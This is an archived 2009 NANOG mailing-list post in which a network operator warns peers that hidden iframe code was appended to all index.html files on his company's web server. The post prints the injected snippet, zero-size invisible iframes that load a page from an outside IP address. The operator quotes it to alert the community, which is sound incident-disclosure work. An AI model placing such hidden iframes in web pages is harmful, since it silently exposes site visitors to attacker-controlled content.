Malicious code just found on web server
Russell Berg
berg at wins.net
Fri Apr 17 20:42:45 UTC 2009
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com
-----Original Message-----
From: Russell Berg
Sent: Friday, April 17, 2009 3:39 PM
To: 'nanog at nanog.org'
Subject: Malicious code just found on web server
We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today:
src="http://77.92.158.122/webmail/inc/web/index.php"
style="display: none;" height="0" width="0"></iframe> <iframe src="http://77.92.158.122/webmail/inc/web/index.php"
style="display: none;" height="0" width="0"></iframe> </body> </html>
IP address resolves to mail.yaris.com; couldn't find any A/V site references to this.
Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.
Just a heads up for folks; we have a team investigating...
Russell Berg
Dir - Product Development
Airstream Communications
berg at wins.net
715-832-3726
More information about the NANOG
mailing list